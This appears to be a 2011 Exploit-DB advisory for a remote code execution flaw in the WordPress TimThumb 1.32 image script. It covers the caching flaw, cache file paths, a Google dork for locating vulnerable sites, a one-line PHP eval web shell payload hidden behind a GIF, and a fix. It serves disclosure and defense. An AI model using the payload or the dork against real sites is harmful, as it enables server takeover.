WordPress Plugin TimThumb 1.32 – Remote Code Execution

  • 作者: MaXe
    日期: 2011-08-03
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/17602/
  • # Exploit Title: WordPress TimThumb Plugin - Remote Code Execution
    # Google Dork: inurl:timthumb ext:php -site:googlecode.com -site:google.com
    # Date: 3rd August 2011
    # Author: MaXe
    # Software Link: http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php
    # Version: 1.32
    # Screenshot: See attachment
    # Tested on: Windows XP + Apache + PHP (XAMPP)
    WordPress TimThumb (Theme) Plugin - Remote Code Execution
    Versions Affected: 
    1.* - 1.32 (Only version 1.19 and 1.32 were tested.)
    (Version 1.33 did not save the cache file as .php)
    Info: (See references for original advisory)
    TimThumb is an image resizing utility, widely used in many WordPress themes.
    External Links:
    - Mark Maunder (Original Researcher)
    - MaXe (Indepedendent Proof of Concept Writer)
    -:: The Advisory ::-
    TimThumb is prone to a Remote Code Execution vulnerability, due to the
    script does not check remotely cached files properly. By crafting a
    special image file with a valid MIME-type, and appending a PHP file at
    the end of this, it is possible to fool TimThumb into believing that it
    is a legitimate image, thus caching it locally in the cache directory.
    Attack URL: (Note! Some websites uses Base64 Encoding of the src GET-request.)
    Stored file on the Target: (This can change from host to host.)
    1.19: http://www.target.tld/wp-content/themes/THEME/cache/md5($src);
    1.32: http://www.target.tld/wp-content/themes/THEME/cache/external_md5($src);
    md5($src); means the input value of the 'src' GET-request - Hashed in MD5 format.
    Proof of Concept File:
    (Transparent GIF + <?php @eval($_GET['cmd']) ?>
    -:: Solution ::-
    Update to the latest version 1.34 or delete the timthumb file.
    NOTE: This file is often renamed and you should therefore issue
    a command like this in a terminal: (Thanks to rAWjAW for this info.)
    find . | grep php | xargs grep -s timthumb
    Disclosure Information:
    - Vulnerability Disclosed (Mark Maunder): 1st August 2011
    - Vulnerability Researched (MaXe): 2nd August 2011
    - Disclosed at The Exploit Database: 3rd August 2011
    Zero Day Vulnerability in many WordPress Themes
    Technical details and scripts of the WordPress Timthumb.php hack
    http://code.google.com/p/timthumb/issues/detail?id=212 http://programming.arantius.com/the+smallest+possible+gif